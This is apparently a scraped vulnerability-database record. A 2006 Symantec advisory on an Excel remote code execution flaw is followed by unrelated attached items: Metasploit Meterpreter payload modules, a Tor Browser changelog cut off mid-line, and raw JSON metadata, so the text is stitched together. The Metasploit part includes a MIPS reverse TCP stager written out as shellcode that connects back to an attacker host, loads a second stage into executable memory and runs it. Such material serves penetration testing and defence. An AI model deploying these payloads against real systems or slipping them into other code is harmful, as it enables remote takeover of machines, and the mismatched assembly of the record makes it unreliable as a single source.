Microsoft Excel Selection Record Variant Remote Code Execution Vulnerability
2006-07-11T00:00:00
ID SMNTC-18885 Type symantec Reporter Symantec Security Response Modified 2006-07-11T00:00:00
Description
Description
Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vector.
Technologies Affected
Microsoft Excel 2000
Microsoft Excel 2000 SP2
Microsoft Excel 2000 SP3
Microsoft Excel 2000 SR1
Microsoft Excel 2002
Microsoft Excel 2002 SP1
Microsoft Excel 2002 SP2
Microsoft Excel 2002 SP3
Microsoft Excel 2003
Microsoft Excel 2003 SP1
Microsoft Excel 2003 SP2
Microsoft Excel 2004 for Mac
Microsoft Excel Viewer 2003
Microsoft Excel x for Mac
Recommendations
Run all software as a nonprivileged user with minimal access rights.
All non-administrative tasks should be performed as an unprivileged user with minimal access rights.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.
Do not accept or execute files from untrusted or unknown sources.
Users should never accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.
Do not follow links provided by unknown or untrusted sources.
Users should avoid websites of questionable integrity. Never follow links supplied by unknown or untrusted sources.
Implement multiple redundant layers of security.
Since this issue may be leveraged to execute code, we recommend memory-protection schemes, such as non-executable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.
Microsoft has released a security advisory addressing this issue.
{"published": "2006-07-11T00:00:00", "id": "SMNTC-18885", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2016-09-04T11:42:09", "bulletin": {"published": "2006-07-11T00:00:00", "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=18885", "cvss": {"score": 0.0, "vector": "NONE"}, "reporter": "Symantec Security Response", "history": [], "description": "### Description\n\nMicrosoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vector. \n\n### Technologies Affected\n\n * Microsoft Excel 2000\n * Microsoft Excel 2000 SP2\n * Microsoft Excel 2000 SP3\n * Microsoft Excel 2000 SR1\n * Microsoft Excel 2002\n * Microsoft Excel 2002 SP1\n * Microsoft Excel 2002 SP2\n * Microsoft Excel 2002 SP3\n * Microsoft Excel 2003\n * Microsoft Excel 2003 SP1\n * Microsoft Excel 2003 SP2\n * Microsoft Excel 2004 for Mac\n * Microsoft Excel Viewer 2003\n * Microsoft Excel x for Mac\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nAll non-administrative tasks should be performed as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not accept or execute files from untrusted or unknown sources.\n\nUsers should never accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n#### Do not follow links provided by unknown or untrusted sources.\n\nUsers should avoid websites of questionable integrity. Never follow links supplied by unknown or untrusted sources.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as non-executable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nMicrosoft has released a security advisory addressing this issue. \n", "bulletinFamily": "software", "viewCount": 0, "cvelist": [], "affectedSoftware": [{"version": "any", "name": "Microsoft Excel x for Mac", "operator": "eq"}, {"version": "2000 SP3", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 SP1", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2000 SP2", "name": "Microsoft Excel", "operator": "eq"}, {"version": "SR1", "name": "Microsoft Excel 2000", "operator": "eq"}, {"version": "2003 SP2", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003", "name": "Microsoft Excel Viewer", "operator": "eq"}, {"version": "2002 SP1", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2000", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2002", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2002 SP3", "name": "Microsoft Excel", "operator": "eq"}, {"version": "Mac", "name": "Microsoft Excel 2004 for", "operator": "eq"}, {"version": "2002 SP2", "name": "Microsoft Excel", "operator": "eq"}], "type": "symantec", "hash": "752ae44849553529a974c2fdbffda40c6e12cdfad6c02ed33e9e2043f6e358c6", "references": ["http://office.microsoft.com/productupdates/default.aspx", "http://www.nsfocus.com/english/homepage/research/0605.htm"], "enchantments": {"score": {"value": 6.5, "modified": "2016-09-04T11:42:09"}}, "title": "Microsoft Excel Selection Record Variant Remote Code Execution Vulnerability", "id": "SMNTC-18885", "lastseen": "2016-09-04T11:42:09", "edition": 1, "objectVersion": "1.2", "hashmap": [{"hash": "1ae5b38882480e5c5019886a31667089", "key": "references"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "2e173b30afc21e9dc4de6082566bfea0", "key": "title"}, {"hash": "01a8d639952fa9dfbb687146dceec6cc", "key": "href"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b31b05c3e7dc37d0c3e2b67faf841a2c", "key": "affectedSoftware"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7f52cbcbbb8f8ce05c6e7dbbbf04465b", "key": "modified"}, {"hash": "7f52cbcbbb8f8ce05c6e7dbbbf04465b", "key": "published"}, {"hash": "ed833ffdfc0d1d9358189bbffb5a03fc", "key": "description"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "modified": "2006-07-11T00:00:00"}}], "description": "### Description\n\nMicrosoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vector.\n\n### Technologies Affected\n\n * Microsoft Excel 2000 \n * Microsoft Excel 2000 SP2 \n * Microsoft Excel 2000 SP3 \n * Microsoft Excel 2000 SR1 \n * Microsoft Excel 2002 \n * Microsoft Excel 2002 SP1 \n * Microsoft Excel 2002 SP2 \n * Microsoft Excel 2002 SP3 \n * Microsoft Excel 2003 \n * Microsoft Excel 2003 SP1 \n * Microsoft Excel 2003 SP2 \n * Microsoft Excel 2004 for Mac \n * Microsoft Excel Viewer 2003 \n * Microsoft Excel x for Mac \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nAll non-administrative tasks should be performed as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nUsers should never accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nUsers should avoid websites of questionable integrity. Never follow links supplied by unknown or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as non-executable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nMicrosoft has released a security advisory addressing this issue.\n", "hash": "73ed1f1f8eb0086662c7b86002035055a7ba48e666016adcdb50a3724466b8cf", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-13T12:07:55"}, "dependencies": {"references": [], "modified": "2018-03-13T12:07:55"}, "vulnersScore": -0.3}, "type": "symantec", "lastseen": "2018-03-13T12:07:55", "edition": 2, "title": "Microsoft Excel Selection Record Variant Remote Code Execution Vulnerability", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/18885", "modified": "2006-07-11T00:00:00", "bulletinFamily": "software", "viewCount": 0, "cvelist": [], "affectedSoftware": [{"version": "2002 SP3 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2000 SR1 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 SP2 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2004 for Mac ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2000 SP2 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 ", "name": "Microsoft Excel Viewer", "operator": "eq"}, {"version": "2002 SP1 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 SP1 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2002 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2002 SP2 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2000 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2000 SP3 ", "name": "Microsoft Excel", "operator": "eq"}], "references": ["http://office.microsoft.com/productupdates/default.aspx", "http://www.nsfocus.com/english/homepage/research/0605.htm"], "reporter": "Symantec Security Response", "hashmap": [{"hash": "9e0ab15f708cbe53e01b8f6c05349f68", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "627436018270f7a822cc854cf4bf5d91", "key": "description"}, {"hash": "5e700ef7546a25fba90a419b14054369", "key": "href"}, {"hash": "7f52cbcbbb8f8ce05c6e7dbbbf04465b", "key": "modified"}, {"hash": "7f52cbcbbb8f8ce05c6e7dbbbf04465b", "key": "published"}, {"hash": "1ae5b38882480e5c5019886a31667089", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "2e173b30afc21e9dc4de6082566bfea0", "key": "title"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-17T15:46:22", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/ARMLE/METERPRETER_REVERSE_TCP", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse TCP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_armle_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1030744\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse TCP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_ARMLE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::Meterpreter_armle_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'tcp',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb"}, {"lastseen": "2019-12-01T18:24:21", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/MIPSBE/METERPRETER_REVERSE_HTTPS", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTPS Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_https'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_mipsbe_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1470620\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttps,\n 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'https',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb"}, {"lastseen": "2019-11-19T23:38:05", "bulletinFamily": "exploit", "description": "Inject the mettle server payload (staged). Connect back to the attacker\n", "modified": "2017-07-24T13:26:21", "published": "2014-01-14T18:25:11", "id": "MSF:PAYLOAD/LINUX/MIPSBE/METERPRETER/REVERSE_TCP", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\n\n\nmodule MetasploitModule\n\n CachedSize = 272\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager',\n 'Description' => 'Connect back to the attacker',\n 'Author' =>\n [\n 'juan vazquez',\n 'tkmru'\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' =>\n {\n 'Offsets' =>\n {\n 'LHOST' => [ [66, 70], 'ADDR16MSB' ],\n 'LPORT' => [ 58, 'n' ],\n },\n 'Payload' =>\n \"\\x24\\x0f\\xff\\xfa\" + # li t7,-6\n \"\\x01\\xe0\\x78\\x27\" + # nor t7,t7,zero\n \"\\x21\\xe4\\xff\\xfd\" + # addi a0,t7,-3\n \"\\x21\\xe5\\xff\\xfd\" + # addi a1,t7,-3\n \"\\x28\\x06\\xff\\xff\" + # slti a2,zero,-1\n \"\\x24\\x02\\x10\\x57\" + # li v0,4183\n # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)\n \"\\x01\\x01\\x01\\x0c\" + # syscall 0x40404\n \"\\x00\\x07\\x80\\x2a\" + # slt s0,zero,a3\n \"\\x16\\x00\\x00\\x36\" + # bnez s0,0x4006bc <failed>\n \"\\xaf\\xa2\\xff\\xfc\" + # sw v0,-4(sp)\n \"\\x8f\\xa4\\xff\\xfc\" + # lw a0,-4(sp)\n \"\\x24\\x0f\\xff\\xfd\" + # li t7,-3\n \"\\x01\\xe0\\x78\\x27\" + # nor t7,t7,zero\n \"\\xaf\\xaf\\xff\\xe0\" + # sw t7,-32(sp)\n \"\\x3c\\x0e\\x11\\x5c\" + # lui t6,0x115c\n \"\\xaf\\xae\\xff\\xe4\" + # sw t6,-28(sp)\n \"\\x3c\\x0e\\x7f\\x00\" + # lui t6,0x7f00\n \"\\x35\\xce\\x00\\x01\" + # ori t6,t6,0x1\n \"\\xaf\\xae\\xff\\xe6\" + # sw t6,-26(sp)\n \"\\x27\\xa5\\xff\\xe2\" + # addiu a1,sp,-30\n \"\\x24\\x0c\\xff\\xef\" + # li t4,-17\n \"\\x01\\x80\\x30\\x27\" + # nor a2,t4,zero\n \"\\x24\\x02\\x10\\x4a\" + # li v0,4170\n # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr(\"127.0.0.1\")}, 16)\n \"\\x01\\x01\\x01\\x0c\" + # syscall 0x40404\n \"\\x00\\x07\\x80\\x2a\" + # slt s0,zero,a3\n \"\\x16\\x00\\x00\\x25\" + # bnez s0,0x4006bc <failed>\n \"\\x24\\x04\\xff\\xff\" + # li a0,-1\n \"\\x24\\x05\\x10\\x01\" + # li a1,4097\n \"\\x20\\xa5\\xff\\xff\" + # addi a1,a1,-1\n \"\\x24\\x09\\xff\\xf8\" + # li t1,-8\n \"\\x01\\x20\\x48\\x27\" + # nor t1,t1,zero\n \"\\x01\\x20\\x30\\x20\" + # add a2,t1,zero\n \"\\x24\\x07\\x08\\x02\" + # li a3,2050\n \"\\x24\\x0b\\xff\\xea\" + # li t3,-22\n \"\\x01\\x60\\x58\\x27\" + # nor t3,t3,zero\n \"\\x03\\xab\\x58\\x20\" + # add t3,sp,t3\n \"\\xad\\x60\\xff\\xff\" + # sw zero,-1(t3)\n \"\\xad\\x62\\xff\\xfb\" + # sw v0,-5(t3)\n \"\\x24\\x02\\x0f\\xfa\" + # li v0,4090\n # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)\n \"\\x01\\x01\\x01\\x0c\" + # syscall 0x40404\n \"\\x00\\x07\\x80\\x2a\" + # slt s0,zero,a3\n \"\\x16\\x00\\x00\\x15\" + # bnez s0,0x4006bc <failed>\n \"\\xaf\\xa2\\xff\\xf8\" + # sw v0,-8(sp)\n \"\\x8f\\xa4\\xff\\xfc\" + # lw a0,-4(sp)\n \"\\x8f\\xa5\\xff\\xf8\" + # lw a1,-8(sp)\n \"\\x24\\x06\\x10\\x01\" + # li a2,4097\n \"\\x20\\xc6\\xff\\xff\" + # addi a2,a2,-1\n \"\\x24\\x02\\x0f\\xa3\" + # li v0,4003\n # read(sockfd, addr, 4096)\n \"\\x01\\x01\\x01\\x0c\" + # syscall 0x40404\n \"\\x00\\x07\\x80\\x2a\" + # slt s0,zero,a3\n \"\\x16\\x00\\x00\\x0c\" + # bnez s0,0x4006bc <failed>\n \"\\x8f\\xa4\\xff\\xf8\" + # lw a0,-8(sp)\n \"\\x00\\x40\\x28\\x20\" + # add a1,v0,zero\n \"\\x24\\x09\\xff\\xfd\" + # li t1,-3\n \"\\x01\\x20\\x48\\x27\" + # nor t1,t1,zero\n \"\\x01\\x20\\x30\\x20\" + # add a2,t1,zero\n \"\\x24\\x02\\x10\\x33\" + # li v0,4147\n # cacheflush(addr, nbytes, DCACHE)\n \"\\x01\\x01\\x01\\x0c\" + # syscall 0x40404\n \"\\x00\\x07\\x80\\x2a\" + # slt s0,zero,a3\n \"\\x16\\x00\\x00\\x03\" + # bnez s0,0x4006bc <failed>\n \"\\x8f\\xb1\\xff\\xf8\" + # lw s1,-8(sp)\n \"\\x8f\\xb2\\xff\\xfc\" + # lw s2,-4(sp)\n \"\\x02\\x20\\xf8\\x09\" + # jalr s1\n # 4006bc <failed>:\n \"\\x24\\x04\\x00\\x01\" + # li\ta0,1\n \"\\x24\\x02\\x0f\\xa1\" + # li\tv0,4001\n # exit(status)\n \"\\x01\\x01\\x01\\x0c\" + # syscall\t0x40404\n \"\\x00\\x20\\x08\\x25\" + # move\tat,at\n \"\\x00\\x20\\x08\\x25\" # move\tat,at\n }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb"}], "kitploit": [{"lastseen": "2019-10-18T16:35:01", "bulletinFamily": "tools", "description": "[  ](<https://3.bp.blogspot.com/-AgiJx9Yf6xA/VEBX9DwZ42I/AAAAAAAADQ0/pDzefI6kUNI/s1600/Tor.png>)\n\n \n \n\n\nThe Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked. \n\n \n\n\nThe Tor Browser lets you use Tor on Windows, Mac OS X, or Linux without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser to protect your anonymity, and is self-contained. \n\n \n\n\nThe Tor Browser Team is proud to announce the first stable release in the 6.0 series. This release is available from the [ Tor Browser Project page ](<https://www.torproject.org/download/download-easy.html>) and also from our [ distribution directory ](<https://www.torproject.org/dist/torbrowser/6.0/>) . \n\n \n\n\nThis release brings us up to date with [ Firefox 45-ESR ](<https://www.mozilla.org/en-US/firefox/organizations/faq/>) , which should mean a better support for HTML5 video on Youtube, as well as a host of other improvements. \n\n \n\n\nBeginning with the 6.0 series code-signing for OS X systems is introduced. This should help our users who had trouble with getting Tor Browser to work on their Mac due to Gatekeeper interference. There were bundle layout changes necessary to adhere to code signing requirements but the transition to the new Tor Browser layout on disk should go smoothly. \n\n \n\n\nThe release also features new privacy enhancements and disables features where we either [ did not have the time ](<https://bugs.torproject.org/16998>) to write a proper fix or where we decided they are rather potentially harmful in a Tor Browser context. \n\n \n\n\n \n\n\nOn the security side this release makes sure that SHA1 certificate support is [ disabled ](<https://bugs.torproject.org/18042>) and our updater is not only relying on the signature alone but [ is checking the hash ](<https://bugs.torproject.org/19121>) of the downloaded update file as well before applying it. Moreover, we provide a [ fix ](<https://bugs.torproject.org/17895>) for a Windows installer related DLL hijacking vulnerability. \n\n \n\n\n** The full changelog since Tor Browser 5.5.5 is **\n\n** Tor Browser 6.0 **\n\n * All Platforms \n\n * Update Firefox to 45.1.1esr \n * Update OpenSSL to 1.0.1t \n * Update Torbutton to 1.9.5.4 \n\n * [ Bug 18466 ](<https://trac.torproject.org/projects/tor/ticket/18466>) : Make Torbutton compatible with Firefox ESR 45 \n * [ Bug 18743 ](<https://trac.torproject.org/projects/tor/ticket/18743>) : Pref to hide 'Sign in to Sync' button in hamburger menu \n * [ Bug 18905 ](<https://trac.torproject.org/projects/tor/ticket/18905>) : Hide unusable items from help menu \n * [ Bug 16017 ](<https://trac.torproject.org/projects/tor/ticket/16017>) : Allow users to more easily set a non-tor SSH proxy \n * [ Bug 17599 ](<https://trac.torproject.org/projects/tor/ticket/17599>) : Provide shortcuts for New Identity and New Circuit \n * Translation updates \n * Code clean-up \n * Update Tor Launcher to 0.2.9.3 \n\n * [ Bug 13252 ](<https://trac.torproject.org/projects/tor/ticket/13252>) : Do not store data in the application bundle \n * [ Bug 18947 ](<https://trac.torproject.org/projects/tor/ticket/18947>) : Tor Browser is not starting on OS X if put into /Applications \n * [ Bug 11773 ](<https://trac.torproject.org/projects/tor/ticket/11773>) : Setup wizard UI flow improvements \n * Translation updates \n * Update HTTPS-Everywhere to 5.1.9 \n * Update meek to 0.22 (tag 0.22-18371-3) \n\n * [ Bug 18371 ](<https://trac.torproject.org/projects/tor/ticket/18371>) : Symlinks are incompatible with Gatekeeper signing \n * [ Bug 18904 ](<https://trac.torproject.org/projects/tor/ticket/18904>) : Mac OS: meek-http-helper profile not updated \n * [ Bug 15197 ](<https://trac.torproject.org/projects/tor/ticket/15197>) and child tickets: Rebase Tor Browser patches to ESR 45 \n * [ Bug 18900 ](<https://trac.torproject.org/projects/tor/ticket/18900>) : Fix broken updater on Linux \n * [ Bug 19121 ](<https://trac.torproject.org/projects/tor/ticket/19121>) : The update.xml hash should get checked during update \n * [ Bug 18042 ](<https://trac.torproject.org/projects/tor/ticket/18042>) : Disable SHA1 certificate support \n * [ Bug 18821 ](<https://trac.torproject.org/projects/tor/ticket/18821>) : Disable libmdns support for desktop and mobile \n * [ Bug 18848 ](<https://trac.torproject.org/projects/tor/ticket/18848>) : Disable additional welcome URL shown on first start \n * [ Bug 14970 ](<https://trac.torproject.org/projects/tor/ticket/14970>) : Exempt our extensions from signing requirement \n * [ Bug 16328 ](<https://trac.torproject.org/projects/tor/ticket/16328>) : Disable MediaDevices.enumerateDevices \n * [ Bug 16673 ](<https://trac.torproject.org/projects/tor/ticket/16673>) : Disable HTTP Alternative-Services \n * [ Bug 17167 ](<https://trac.torproject.org/projects/tor/ticket/17167>) : Disable Mozilla's tracking protection \n * [ Bug 18603 ](<https://trac.torproject.org/projects/tor/ticket/18603>) : Disable performance-based WebGL fingerprinting option \n * [ Bug 18738 ](<https://trac.torproject.org/projects/tor/ticket/18738>) : Disable Selfsupport and Unified Telemetry \n * [ Bug 18799 ](<https://trac.torproject.org/projects/tor/ticket/18799>) : Disable Network Tickler \n * [ Bug 18800 ](<https://trac.torproject.org/projects/tor/ticket/18800>) : Remove DNS lookup in lockfile code \n * [ Bug 18801 ](<https://trac.torproject.org/projects/tor/ticket/18801>) : Disable dom.push preferences \n * [ Bug 18802 ](<https://trac.torproject.org/projects/tor/ticket/18802>) : Remove the JS-based Flash VM (Shumway) \n * [ Bug 18863 ](<https://trac.torproject.org/projects/tor/ticket/18863>) : Disable MozTCPSocket explicitly \n * [ Bug 15640 ](<https://trac.torproject.org/projects/tor/ticket/15640>) : Place Canvas MediaStream behind site permission \n * [ Bug 16326 ](<https://trac.torproject.org/projects/tor/ticket/16326>) : Verify cache isolation for Request and Fetch APIs \n * [ Bug 18741 ](<https://trac.torproject.org/projects/tor/ticket/18741>) : Fix OCSP and favicon isolation for ESR 45 \n * [ Bug 16998 ](<https://trac.torproject.org/projects/tor/ticket/16998>) : Disable <link rel=\"preconnect\"> for now \n * [ Bug 18898 ](<https://trac.torproject.org/projects/tor/ticket/18898>) : Exempt the meek extension from the signing requirement as well \n * [ Bug 18899 ](<https://trac.torproject.org/projects/tor/ticket/18899>) : Don't copy Torbutton, TorLauncher, etc. into meek profile \n * [ Bug 18890 ](<https://trac.torproject.org/projects/tor/ticket/18890>) : Test importScripts() for cache and network isolation \n * [ Bug 18886 ](<https://trac.torproject.org/projects/tor/ticket/18886>) : Hide pocket menu items when Pocket is disabled \n * [ Bug 18703 ](<https://trac.torproject.org/projects/tor/ticket/18703>) : Fix circuit isolation issues on Page Info dialog \n * [ Bug 19115 ](<https://trac.torproject.org/projects/tor/ticket/19115>) : Tor Browser should not fall back to Bing as its search engine \n * [ Bug 18915 ](<https://trac.torproject.org/projects/tor/ticket/18915>) \\+ [ 19065 ](<https://trac.torproject.org/projects/tor/ticket/19065>) : Use our search plugins in localized builds \n * [ Bug 19176 ](<https://trac.torproject.org/projects/tor/ticket/19176>) : Zip our language packs deterministically \n * [ Bug 18811 ](<https://trac.torproject.org/projects/tor/ticket/18811>) : Fix first-party isolation for blobs URLs in Workers \n * [ Bug 18950 ](<https://trac.torproject.org/projects/tor/ticket/18950>) : Disable or audit Reader View \n * [ Bug 18886 ](<https://trac.torproject.org/projects/tor/ticket/18886>) : Remove Pocket \n * [ Bug 18619 ](<https://trac.torproject.org/projects/tor/ticket/18619>) : Tor Browser reports \"InvalidStateError\" in browser console \n * [ Bug 18945 ](<https://trac.torproject.org/projects/tor/ticket/18945>) : Disable monitoring the connected state of Tor Browser users \n * [ Bug 18855 ](<https://trac.torproject.org/projects/tor/ticket/18855>) : Don't show error after add-on directory clean-up \n * [ Bug 18885 ](<https://trac.torproject.org/projects/tor/ticket/18885>) : Disable the option of logging TLS/SSL key material \n * [ Bug 18770 ](<https://trac.torproject.org/projects/tor/ticket/18770>) : SVGs should not show up on Page Info dialog when disabled \n * [ Bug 18958 ](<https://trac.torproject.org/projects/tor/ticket/18958>) : Spoof screen.orientation values \n * [ Bug 19047 ](<https://trac.torproject.org/projects/tor/ticket/19047>) : Disable Heartbeat prompts \n * [ Bug 18914 ](<https://trac.torproject.org/projects/tor/ticket/18914>) : Use English-only label in <isindex/> tags \n * [ Bug 18996 ](<https://trac.torproject.org/projects/tor/ticket/18996>) : Investigate server logging in esr45-based Tor Browser \n * [ Bug 17790 ](<https://trac.torproject.org/projects/tor/ticket/17790>) : Add unit tests for keyboard fingerprinting defenses \n * [ Bug 18995 ](<https://trac.torproject.org/projects/tor/ticket/18995>) : Regression test to ensure CacheStorage is disabled \n * [ Bug 18912 ](<https://trac.torproject.org/projects/tor/ticket/18912>) : Add automated tests for updater cert pinning \n * [ Bug 16728 ](<https://trac.torproject.org/projects/tor/ticket/16728>) : Add test cases for favicon isolation \n * [ Bug 18976 ](<https://trac.torproject.org/projects/tor/ticket/18976>) : Remove some FTE bridges \n * Windows \n\n * [ Bug 13419 ](<https://trac.torproject.org/projects/tor/ticket/13419>) : Support ICU in Windows builds \n * [ Bug 16874 ](<https://trac.torproject.org/projects/tor/ticket/16874>) : Fix broken [ https://sports.yahoo.com/dailyfantasy 